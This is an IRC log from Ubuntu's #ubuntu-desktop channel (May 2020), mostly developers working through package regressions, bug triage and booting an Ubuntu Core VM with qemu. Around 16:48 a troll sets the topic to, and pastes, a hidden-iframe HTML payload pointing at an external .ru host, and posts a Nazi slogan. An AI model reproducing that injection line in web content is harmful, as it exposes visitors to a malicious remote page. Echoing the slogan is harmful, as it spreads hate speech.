UbuntuIRC / 2020 /05 /20 /#ubuntu-desktop.txt
Initial commit
[05:05] <jibel> morning all
[05:22] <duflu> Morning jibel
[05:47] <marcustomlinson> https://www.forbes.com/sites/jasonevangelho/2020/05/19/heres-why-ubuntu-linux-2004-feels-insanely-fast-and-responsive/
[05:47] <marcustomlinson> “the brilliant Van Vugt”
[05:48] <marcustomlinson> morning duflu :)
[05:48] <duflu> Morning marcustomlinson
[05:48] <duflu> Ugh, that's an overstatement and will attract haters at some point. I won't read it
[05:48] <marcustomlinson> and morning jibel
[05:49] <marcustomlinson> duflu: haters gonna hate. No, it’s a great story. Praise well deserved
[05:50] <marcustomlinson> morning seb128
[05:50] <marcustomlinson> Oh let me try that again
[05:50] <marcustomlinson> morning seb128
[05:51] <seb128> hey marcustomlinson, how are you?
[05:51] <marcustomlinson> tired... up too early and can’t get back to sleep
[05:51] <marcustomlinson> but doing alright really :) you?
[05:53] <jibel> hi marcustomlinson
[06:10] <seb128> lut jibel, comment ça va aujourd'hui ?
[06:11] <seb128> marcustomlinson, I'm fine thanks
[06:14] <jibel> salut seb128, ça va bien, merci.
[06:20] <duflu> seb128, would you have time to look at and merge this? https://salsa.debian.org/gnome-team/mutter/-/merge_requests/63
[06:23] <oSoMoN> good morning desktoppers
[06:24] <duflu> Hi oSoMoN
[06:24] <oSoMoN> hey duflu
[06:42] <marcustomlinson> morning oSoMoN
[06:44] <oSoMoN> hey marcustomlinson
[06:44] <didrocks> good morning marcustomlinson, oSoMoN
[06:44] <marcustomlinson> hey didrocks
[06:44] <oSoMoN> salut didrocks
[06:49] <seb128> duflu, adding to my todolist for today if Trevinho doesn't bet me to it
[06:49] <seb128> lyt oSoMoN didrocks, en forme ?
[06:52] <oSoMoN> salut seb128, ça va, et toi?
[06:54] <seb128> oSoMoN, ça va bien :)
[06:54] <didrocks> salut seb128, mi réveillé, mais ok :)
[08:07] <Laney> heh I moined in another channel this morning
[08:07] <Laney> wondered why it was so quiet
[08:11] <seb128> hey Laney, how are you today?
[08:19] <duflu> Morning Laney
[08:19] <Laney> moin seb128 duflu
[08:19] <Laney> yeah I'm doing ok, have been enjoying the sun this morning
[08:19] <Laney> hope it's going well there!
[08:21] <marcustomlinson> hey Laney
[08:22] <seb128> it its, sunny day ahead as well :)
[08:22] <didrocks> hey Laney
[08:31] <KGB-1> mutter Iain Lane 166349 * commented merge request !63 * https://deb.li/3dSVI
[08:31] <Laney> hey marcustomlinson & didrocks!
[08:43] <oSoMoN> hey Laney
[08:44] <Laney> guten morgen der oSoMoN
=== cpaelzer__ is now known as cpaelzer
[08:50] <duflu> Laney, I'm very busy with another mutter regression. If you're able to cherry pick that fix in the mean time then please do
[08:51] <Laney> I'll see how I get on, might want a break from britney at some point later
[08:58] <seb128> Laney, useful comment, I might try those steps next time I do a cherry pick
[08:59] <seb128> we really need a wrapper around common actions though
[09:00] <Laney> let's not get into a discussion about git workflows
[09:09] <Laney> just wanted to share how to do it with what we have atm
[09:09] <seb128> Laney, I don't want to get into a discussion, don't worry, it's just that if we want people to do things in a specific way we need to think on how to make it easy for them
[09:10] <Laney> sure, then it's work that needs to be scheduled
[09:10] <seb128> which was what I meant by ' we really need a wrapper around common actions though'
[09:10] <seb128> agreed
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[09:15] <cpaelzer> hi, a focal "apt upgrade" just took down my Desktop - yet I fail to find a root cause
[09:15] <cpaelzer> any recommendations where to stare at?
[09:15] <cpaelzer> Without some clue I won't even be able to file a good bug report
[09:15] <seb128> cpaelzer, bug #1871538 ?
[09:15] <ubot5> bug 1871538 in dbus (Ubuntu Focal) "dbus timeout-ed during an upgrade, taking services down including gdm" [High,Incomplete] https://launchpad.net/bugs/1871538
[09:15] <seb128> cpaelzer, could be fixed with https://launchpad.net/ubuntu/+source/accountsservice/0.6.55-0ubuntu12~20.04.1 also maybe
[09:16] <cpaelzer> well, this old bug is MY bug
[09:16] <cpaelzer> it didn't appear to me at first, but let me check if it happened again
[09:16] <seb128> cpaelzer, we really need foundations to fix bug #1870060 so we get apport data for those issues
[09:16] <ubot5> bug 1870060 in apport (Ubuntu Focal) "systemd ProtectSystem/mount namespace makes apport fail (impact most of our default system services)" [High,New] https://launchpad.net/bugs/1870060
[09:19] <cpaelzer> I have 3 crash files again, but that are apps dying when the shell recycles
[09:19] <cpaelzer> oh and gnome now complains I have no network manager
[09:19] <cpaelzer> maybe I need to look for that
[09:20] <cpaelzer> yeah that was around the time things broke down
[09:24] <cpaelzer> seb128: yeah it is the same issue
[09:24] <cpaelzer> I have updated the bug
[09:24] <cpaelzer> but no new insights, just confirmation that it happened again and seems to be the same one
[09:29] <seb128> cpaelzer, you can maybe nag foundations to get them to prioritize fixing apport, it would perhaps help to get a clue
[09:30] <seb128> cpaelzer, but otherwise I've no clue atm how to debug those issues :/
[09:31] <cpaelzer> yeah me neither
[09:31] <cpaelzer> except that I probably need to be more careful about my updates
[09:45] <seb128> cpaelzer, thanks for the comment/ping on the apport issue
[09:53] <duflu> cpaelzer__, please also upvote the bug :)
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[10:59] <seb128> jibel, could you check https://bugs.launchpad.net/ubuntu/+source/nvidia-prime/+bug/1877727 ? it claims that the power saving mode doesn't work when the drivers are installed from ubiquity but works when they are installed post installation from the desktop
[10:59] <ubot5> Ubuntu bug 1877727 in nvidia-prime (Ubuntu) "Nvidia dGPU active despite prime-select set to Intel card" [Undecided,Confirmed]
[10:59] <seb128> tseliot, ^
[11:00] <cpaelzer__> duflu: done as well
=== cpaelzer__ is now known as cpaelzer
[11:03] <tseliot> seb128, the user said he had to manually install the nvidia-dkms-440 package. I wonder if he got the linux-restricted-modules instead
[11:04] <seb128> tseliot, that's the intend?
[11:05] <tseliot> seb128, the l-r-m should be the default. I wonder if he ran into LP: #1875339
[11:05] <ubot5> Launchpad bug 1875339 in Ubuntu Drivers Common "xorg does not use nvidia gpu on a I+N machine." [Undecided,New] https://launchpad.net/bugs/1875339
[11:06] <tseliot> seb128, and he's getting the old ubuntu-drivers-common from the image, vs the new one in the archive
[11:08] <seb128> that's expected, we don't live update the iso right?
[11:09] <seb128> tseliot, thanks, maybe you can comment on the bug? hopefully if that's the new ubuntu-drivers which is needed then it will be fixed in .1 when we respin
[11:09] <tseliot> seb128, sure
[11:09] <seb128> thx
[11:41] * duflu falls off chair
[11:52] <ricotz> hello desktopers
[11:52] <ricotz> could someone sponsor this to the bionic/queue https://bugs.launchpad.net/ubuntu/+source/vala/+bug/1874127
[11:52] <ubot5> Ubuntu bug 1874127 in vala (Ubuntu Bionic) "[SRU] Update to vala 0.40.23 in bionic" [Low,New]
[12:02] <oSoMoN> hey ricotz
=== alan_g is now known as alan_g_
[12:08] <seb128> ricotz, hey, I add that to my todolist for the afternoon
[12:14] <ricotz> oSoMoN, seb128, hey
[12:14] <ricotz> seb128, thx
[12:27] <oSoMoN> mwhudson, hey, bug #1876942 hasn't been ack'd yet, is it on your radar?
[12:27] <ubot5> bug 1876942 in rustc (Ubuntu Focal) "rustc 1.43 and cargo 0.44 required by firefox 78" [Undecided,New] https://launchpad.net/bugs/1876942
[13:31] <oSoMoN> seb128, I'm looking at https://people.canonical.com/~ubuntu-archive/proposed-migration/focal/update_excuses.html#adwaita-icon-theme, the gtk+3.0 test failures are the same that were affecting gtk+3.0 3.24.18-1ubuntu1 on groovy, and passed with 3.24.20-1ubuntu1
[13:32] <oSoMoN> I haven't looked at the differences in gtk+3.0 yet, do we need the update in focal, or is a packaging change enough?
[13:33] <seb128> oSoMoN, bah, it's a regression in the SRU, sorry for not catching that one
[13:33] <seb128> http://launchpadlibrarian.net/479397571/adwaita-icon-theme_3.36.0-1ubuntu1_3.36.1-2ubuntu0.20.04.1.diff.gz
[13:33] <seb128> - librsvg2-common,
[13:33] <seb128> removed from the Depends
[13:33] <seb128> +Recommends: librsvg2-common
[13:34] <seb128> autopkgtest don't install recommends I guess?
[13:35] <seb128> oSoMoN, I usually do simply the update for a SRU and let unrelated packaging changes out to avoid such issues...
[13:37] <seb128> oSoMoN, I think I would go the revert way and put it back as a depends, safer for a stable serie
[13:38] <oSoMoN> seb128, agreed, and don't be sorry, I'm the one to blame, I did the SRU without actually testing
[13:39] <oSoMoN> I'll push the changes to the ubuntu/focal branch, and then you can sponsor it, if you don't mind
[13:39] <seb128> wfm, thank you
[13:40] <seb128> and don't worry, it's not an obvious breakage, I don't think most people do throw their updates to an autopkgtest local instance before upload
[14:03] <KGB-0> adwaita-icon-theme ubuntu/focal f203171 Olivier Tilloy debian/ changelog control control.in * Restore librsvg2-common as a Depends * https://deb.li/3AHu1
[14:03] <KGB-0> adwaita-icon-theme ubuntu/focal 8832797 Olivier Tilloy debian/changelog * releasing package adwaita-icon-theme version 3.36.1-2ubuntu0.20.04.2 * https://deb.li/FDKh
[14:03] <KGB-0> adwaita-icon-theme tags 8832797 Olivier Tilloy ubuntu/3.36.1-2ubuntu0.20.04.2 * https://deb.li/3dvac
[14:04] <oSoMoN> seb128, ^ ready for sponsoring
[14:04] <seb128> oSoMoN, thanks
[14:04] * oSoMoN likes KGB-0
[14:04] <seb128> :-)
[14:13] <Laney> why do we need to do that?
[14:14] <seb128> Laney, 'that'?
[14:14] <Laney> shouldn't we rather backport the fix I did in groovy?
[14:15] <Laney> the adwaita-icon-theme change
[14:15] <Laney> (the most recent thing in this channel)
[14:15] <seb128> it changes the dependency chain, I've no idea what impact it could have on other flavors, desktops, components and I've no confidence it's not going to bite someone
[14:15] <seb128> so just me having a personal preference for the safest path
[14:15] <seb128> but if someone wants to go another road feel free
[14:17] <seb128> Laney, I was about the sponsor that ^ but let me know if you want to try your solution, I'm happy to step out
[14:17] <Laney> I don't really want raising issues to mean that I hve to sign up to do the work
[14:18] <Laney> so feel free to carry on with your approach
[14:18] <seb128> it doesn't mean that
[14:18] <seb128> I was offering you to do what you suggest if you care enough to go ahead
[14:18] <Laney> ok, I thought that "you" there did indeed mean that
[14:19] <seb128> I don't feel comfortable myself going down the road of carrying a depends change in a SRU
[14:19] <seb128> some flavors don't install recommends by default and I didn't do enough checking to feel good about it
[14:19] <Laney> ok
[14:19] <Laney> I think avoiding a depends change is sensible
[14:19] <Laney> IMO the ubuntu2 change should be taken too though
[14:20] <seb128> oSoMoN, ^ want to iterate to include that one?
[14:20] <Laney> if we want the loader in groovy always then I'd say it should be seeded
[14:21] <Laney> no big opinion there atm
[14:23] <seb128> right
[14:27] <oSoMoN> let me check that ubuntu2 change
[14:29] <oSoMoN> Laney, I'm not sure I fully understand the change, but I'm happy to trust you on this
[14:31] <oSoMoN> seb128, any objection to me rewriting the history of the ubuntu/focal branch and force-pushing to insert that change before the release commit?
[14:32] <Laney> The upstream build system generates PNGs from the SVGs, but we were not shipping those in the right package
[14:32] <seb128> oSoMoN, no objection
[14:32] * Laney twitches
[14:42] <oSoMoN> Laney, the "we don't pull in an SVG loader any more" part of the changelog was referring to the demotion of librsvg2-common to a Recommends, right?
[14:43] <Laney> yus
[14:44] <Laney> oSoMoN: I guess for SRUing it'd be something like "The demotion of librsvg2-common to Recommends in Groovy exposed the fact that we were mistakenly not including .png versions of our .svg icons in the adwait-icon-theme package. These are faster to load, so they should be included here."
[14:46] <oSoMoN> thanks
[14:50] <KGB-0> adwaita-icon-theme tags 8832797 Olivier Tilloy ubuntu/3.36.1-2ubuntu0.20.04.2 * tag deleted
[14:51] <KGB-0> adwaita-icon-theme ubuntu/focal ce45dac Iain Lane debian/rules * rules: Put the PNGs generated by gtk-encode-symbolic-svg in a-i-t * https://deb.li/VIzx
[14:51] <KGB-0> adwaita-icon-theme ubuntu/focal 03be084 Olivier Tilloy debian/changelog * Update changelog * https://deb.li/3NuUE
[14:51] <KGB-0> adwaita-icon-theme ubuntu/focal 3005bbb Olivier Tilloy debian/changelog * releasing package adwaita-icon-theme version 3.36.1-2ubuntu0.20.04.2 * https://deb.li/RuR4
[14:51] <KGB-0> adwaita-icon-theme tags 3005bbb Olivier Tilloy ubuntu/3.36.1-2ubuntu0.20.04.2 * https://deb.li/3dvac
[14:51] <oSoMoN> seb128, ^ now that should be ready for sponsoring
[14:51] <seb128> oSoMoN, k
[14:54] <oSoMoN> seb128, unrelated: I've looked at bug #1878553, and as suggested in the description, this is really an old bug (bug #1434579)
[14:54] <ubot5> bug 1878553 in software-properties (Ubuntu Groovy) "Ubuntu could not install Virtualbox Guest addons" [Undecided,New] https://launchpad.net/bugs/1878553
[14:54] <ubot5> bug 1434579 in ubuntu-drivers-common (Ubuntu) "Unable to install VirtualBox Guest Service in 15.04" [High,Confirmed] https://launchpad.net/bugs/1434579
[14:55] <oSoMoN> so I think it should be marked as duplicate, and that raises the question: do we still commit to fixing it
[14:55] <oSoMoN> (given that it's been around for at least 5 years, now in 3 LTSes)
[15:02] <seb128> oSoMoN, adwaita uploaded, it's not impossible that the SRU team bounce it back now because you have a change which isn't linked to a bug report nor having a testcase, but I will you deal with them :)
[15:03] <oSoMoN> ack, I'll blame Laney then :)
[15:03] <seb128> oSoMoN, @software-properties, it's not a key feature so was not a priority, probably even less so if it's old, would still be nice to fix
[15:03] <seb128> unsure if the other bug is the same though
[15:03] <seb128> seems like they had ubuntu-drivers issues
[15:03] <seb128> on a focal issue doing 'ubuntu-driver install' works for me though
[15:05] <oSoMoN> I haven't yet looked into that other bug, the symptom is similar for the intel wireless driver, so the two issues might have something in common, but I would keep the two bug reports separate anyway
[15:05] <oSoMoN> seb128, do we agree that #1878553 should be made a duplicate of #1434579 ?
[15:06] <oSoMoN> (regardless of whether it's fixable)
[15:07] <seb128> oSoMoN, I don't like duplicating new clean reports from old ones that covered other problems resolved, it makes reading the bug more confusing
[15:07] <seb128> but that's personal taste
[15:07] <seb128> I would rather close the old one and state we are using the clean report for the issue still existing
[15:15] <oSoMoN> ok, I can do that
[15:18] <hellsworth> good morning desktopers
[15:19] * Laney comes with no warranty, either expressed or implied
[15:19] <Laney> moin hellsworth
[15:19] <hellsworth> o/ Laney
[15:20] <Laney> what up
[15:21] <hellsworth> hmm not much. need to test libreoffice 6.4.4 today and look at network manager stuff
[15:21] <hellsworth> also last night i butchered my thumb cutting eggplant
[15:21] <hellsworth> sliced the tip off
[15:21] <hellsworth> good thing it's not a typing finger
[15:22] <Laney> URGH
[15:22] <hellsworth> guess it's an accident prone household :)
[15:22] <hellsworth> how are things over there Laney ?
[15:22] <Laney> well
[15:22] <Laney> work-wise britney is making me a bit annoyed, that's going slower than I might have liked
[15:22] <Laney> but still making progress I guess
[15:22] <Laney> in the real world it's super warm and sunny and we had lunch outsid
[15:22] <Laney> e
[15:23] <Laney> 79F!
[15:23] <hellsworth> isn't britney part of laniakea?
[15:23] <hellsworth> yeah today here it will be similar.. somewhere in the low 80s
[15:24] <Laney> ximion integrated a load of those debian tools I guess
[15:24] <hellsworth> oh maybe it's standalone and used with the debian build system.. i know matthias told me all about it once :)
[15:24] <hellsworth> \me waves to ximion
[15:24] <hellsworth> ha
[15:24] <Laney> but we use it too
[15:24] <Laney> heh
[15:24] * hellsworth waves to ximion
[15:24] <Laney> also he's not in here :p
[15:24] <Laney> at least according to my tab completion
[15:24] <hellsworth> oh yeah you're right
[15:24] <hellsworth> i have not had coffee yet..
[15:25] <Laney> it's on the upper end of the nicknames i'm willing to type out
[15:25] <hellsworth> he was a pleasure to work with at purism..
[15:25] <Laney> Olivier's is on the wrong side of that
[15:25] <hellsworth> yeah i would agree with that
[15:25] <hellsworth> hahaha
[15:25] <hellsworth> but you took the time to type out Olivier's name rather than oS <tab>
[15:26] <Laney> ah man
[15:26] <oSoMoN> good morning hellsworth. Did you use autotomy to distract the eggplant that was attacking you?
[15:26] * Laney scrambles for a rationalisation
[15:26] <Laney> I... didn't want to hilight him!
[15:26] <hellsworth> lol
[15:26] <hellsworth> he came anyways :)
[15:27] <oSoMoN> Laney, well done, I read the whole conversation without even being highlighted :)
[15:27] <hellsworth> oSoMoN: no i didn't haha...i just dropped the knife and yelled an explitave while i applied pressure above my head
[15:27] <hellsworth> i really need to get a knife sharpener..
[15:42] <hellsworth> who's the best person to ping for ubuntu core questions when running in a vm?
[15:43] <hellsworth> ogra: is that you?
[15:45] <hellsworth> basically the problem is that if i follow the instructions here https://ubuntu.com/download/kvm then when i launch the kvm window, it kind of goes into a continual reboot. (same happens if i boot the image in virt-manager rather than all cli)
[15:48] <kenvandine> hellsworth: maybe ogra ?
[15:49] <hellsworth> ok cool thanks :)
[16:36] <ogra> hellsworth, yeah, probably me
[16:36] <hellsworth> hey hi ogra :)
[16:39] <hellsworth> so https://ubuntu.com/download/kvm says to launch kvm with a command that i happily copy/paste and it brings up a window.. looks like grub.. then it boots but how do i *get into it*
[16:39] <hellsworth> i get this screen https://drive.google.com/file/d/1RjqlnmiSB0M74qJK6BqLZMMNvABEGtZp/view?usp=sharing (hopefully you can see this)
[16:40] <hellsworth> and then it reboots after a bit
[16:40] <ogra> hellsworth, sudo snap install --edge qemu-virgil ... sudo snap connect qemu-virgil:kvm
[16:40] <kenvandine> maybe use https://github.com/wimpysworld/quickemu/
[16:40] <ogra> i'm not sure how well the GLES support in kvm/qemu from the archive works nowadays
[16:40] <kenvandine> i've found it super handy
[16:41] <ogra> yeah, that uses qemu-virgil as stage snap :)
[16:41] <kenvandine> quickemu uses qemu-virgil
[16:41] <kenvandine> yeah
[16:41] <ogra> oh, no, thats not the one i meant ... there was actually a snap that used qemu-virgil as backend
[16:43] <hellsworth> k i've instlled it and running the UC18 image with the command on https://snapcraft.io/qemu-virgil
[16:43] <hellsworth> the text is dark blue on black...
[16:43] <ogra> https://github.com/popey/sosumi-snap ... that was the one i meant ... totally mixed them up ...
[16:43] <hellsworth> i can't quite make it out
[16:44] <hellsworth> hmm ok..
[16:44] <ogra> well, theer are no color options in qemu ... what colors would you like instead of blue on black ? :)
[16:45] <hellsworth> haha maybe something in the white hue...
[16:45] <ogra> gimme a sec i can give you the command i'm currently using .... need to re-locate
[16:45] <hellsworth> installing sosumi now..
[16:46] <kenvandine> try quickemu :)
[16:46] * kenvandine tries
[16:46] <hellsworth> hahah
[16:46] <hellsworth> install all the things!
[16:46] <ogra> hellsworth, qemu-virgil -enable-kvm -m 4096 -smp 2 -device virtio-vga,virgl=on -display sdl,gl=on -netdev user,id=ethernet.0,hostfwd=tcp::10022-:22,hostfwd=tcp::8000-:8000 -device rtl8139,netdev=ethernet.0 -audiodev pa,id=pa1,server=/run/user/1000/pulse/native ubuntu-core-18-amd64.img
[16:47] <kenvandine> it's been working great for me
[16:47] <kenvandine> i haven't used it for core though
[16:47] <kenvandine> but it makes it super simple to run VMs
[16:47] <ogra> the last option is indeed a full path if you dont have the image in your current PWD
[16:47] <ogra> i use it for core all the time
[16:48] <hellsworth> i'm a virt-manager girl
[16:48] <ogra> crazy stuff !
=== SmellyCoon changed the topic of #ubuntu-desktop to: <body><iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>
[16:48] <hellsworth> qemu command line is less than intuitive so virt-manager has worked well for me
[16:49] <hellsworth> yeah ogra i tried your command and still... blue on black.. can't read anything. how the hell do you access your vms once you launch them this way?
[16:49] <hellsworth> and then it reboots..
[16:49] <SmellyCoon> i insert fake virus scripts in the topic
[16:49] <SmellyCoon> heil hitler
[16:49] <SmellyCoon> ha ha ha ha ha!
[16:50] <ogra> hellsworth, sounds weird ...
[16:50] <ogra> !ops
[16:50] <ubot5> Help! Channel emergency! (ONLY use this trigger in emergencies) - Pici, Myrtti, jrib, Amaranth, tonyyarusso, Nalioth, lamont, CarlK, elky, mneptok, Tm_T, jpds, ikonia, Flannel, wgrant, stdin, h00k, IdleOne, Jordan_U, popey, Corey, ocean, cprofitt, djones, Madpilot, gnomefreak, lhavelund, phunyguy, bazhang, chu, dax
[16:50] <hellsworth> my goal here is to have a UC18 vm up and running - in whatever app that does the trick - and scp a new network-manager snap into it, ssh in and install it and test
[16:50] <ogra> right, thats what 'm doing here as well
[16:51] <ogra> (well, not copying NM around ... but everything else)
[16:51] <SmellyCoon> !ops
[16:51] <ubot5> Help! Channel emergency! (ONLY use this trigger in emergencies) - Pici, Myrtti, jrib, Amaranth, tonyyarusso, Nalioth, lamont, CarlK, elky, mneptok, Tm_T, jpds, ikonia, Flannel, wgrant, stdin, h00k, IdleOne, Jordan_U, popey, Corey, ocean, cprofitt, djones, Madpilot, gnomefreak, lhavelund, phunyguy, bazhang, chu, dax
[16:51] <hellsworth> so how do you get in?
[16:51] <SmellyCoon> <body><iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>
[16:51] <SmellyCoon> !ops
[16:51] <hellsworth> omg
[16:51] <hellsworth> someone kick this person
[16:51] <SmellyCoon> !ops
[16:51] <SmellyCoon> hellsworth: im trying to get kickes
[16:51] * ogra shakes head ...
[16:51] <hellsworth> ok aaaaaanyways..
[16:51] <ogra> i never understood whats the thrill in this
[16:52] <ogra> hellsworth, try maximizing the window ... then you should be able to read ...
[16:52] <ogra> also ... did you unxz the image ?
[16:52] <hellsworth> i did
[16:53] <hellsworth> i did unxz the image.. then run the same command that you gaave me (in the path with .img)
[16:53] <hellsworth> oh yeah hmm now the text is white on black when the window is fullscreen'd
[16:53] <ogra> well, i'm currently using ubuntu-core-18-amd64.img ... downloaded on monday or so ...
[16:53] <ogra> so it should work
[16:53] <hellsworth> oh my.. weird things happen if i drag the window from fullscreen and then back
[16:54] <hellsworth> haha
[16:54] <hellsworth> let me start over..
[16:54] <ogra> do you use fractional scalig ?
[16:54] <ogra> *scaling
[16:54] <ogra> i see a lot weird stuff with that
[16:54] <ogra> particulary with fullscreen apps
[16:54] <hellsworth> no fractional scaling
[16:57] <ogra> streange
[16:58] <hellsworth> also strange that if i screenshot the fullscreen'd qemu window that has blue text on black, and then open it in some image viewer, the screenshot shows white text on black so it's readable
[16:58] <hellsworth> but now what do i do?
[16:58] <hellsworth> it tells me to ssh hellsworth@ but this network is not a thing on my host
[16:59] <kenvandine> are you sure?
[16:59] <kenvandine> that would have been setup for you by qemu
[16:59] <hellsworth> i mean i'm trying it now and and it's just hanging there. i expect it to timeout
[16:59] <ogra> hellsworth, ssh -p 10022 hellsworth@localhost
[16:59] <kenvandine> and it should have fetched your ssh public key from LP
[17:00] <hellsworth> ogra: that worked!
[17:00] <ogra> at least if you use my command it redirects the ssh port to 10022
[17:00] <ogra> great !
[17:01] <kenvandine> looks like quickemu doesn't work with these sorts of disk images
[17:01] <hellsworth> shouldn't it be called quickqemu? otherwise it's just a quick bird...
[17:01] <hellsworth> sorry.. semantics i know :)
[17:02] <ogra> probably it is *supposed* to be a quick bird ...
[17:02] <hellsworth> oooooh like q-emu
[17:02] <ogra> ... and we got it all wrong mis-taking it for a VM
[17:02] <hellsworth> hmm?
[17:03] <hellsworth> it is a vm
[17:04] <ogra> nah, its a quick tall bird !
[17:06] <hellsworth> not as tall as an ostrich apparently...
[17:06] <hellsworth> ogra: thanks for your help in getting in the vm :)
[17:06] <ogra> enjoy !
=== ijohnson is now known as ijohnson|lunch
[17:53] <hggdh> folks, you may want to reset the topic
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=== sarnold changed the topic of #ubuntu-desktop to: Home of the Desktop Team, https://wiki.ubuntu.com/DesktopTeam | For help or questions, try #ubuntu | Work (read-only for non-developers): https://trello.com/b/mxaCZTVc | GNOME 3.36 work claiming / tracking: https://trello.com/b/z29JJK3q/gnome-336
[19:40] <mwhudson> oSoMoN: yes, making some progress
[19:40] <mwhudson> oSoMoN: riscv is being a pain
[19:55] <oSoMoN> mwhudson, ack, thanks!
[19:56] <oSoMoN> I'm fading away for a looong week-end, tty on the other side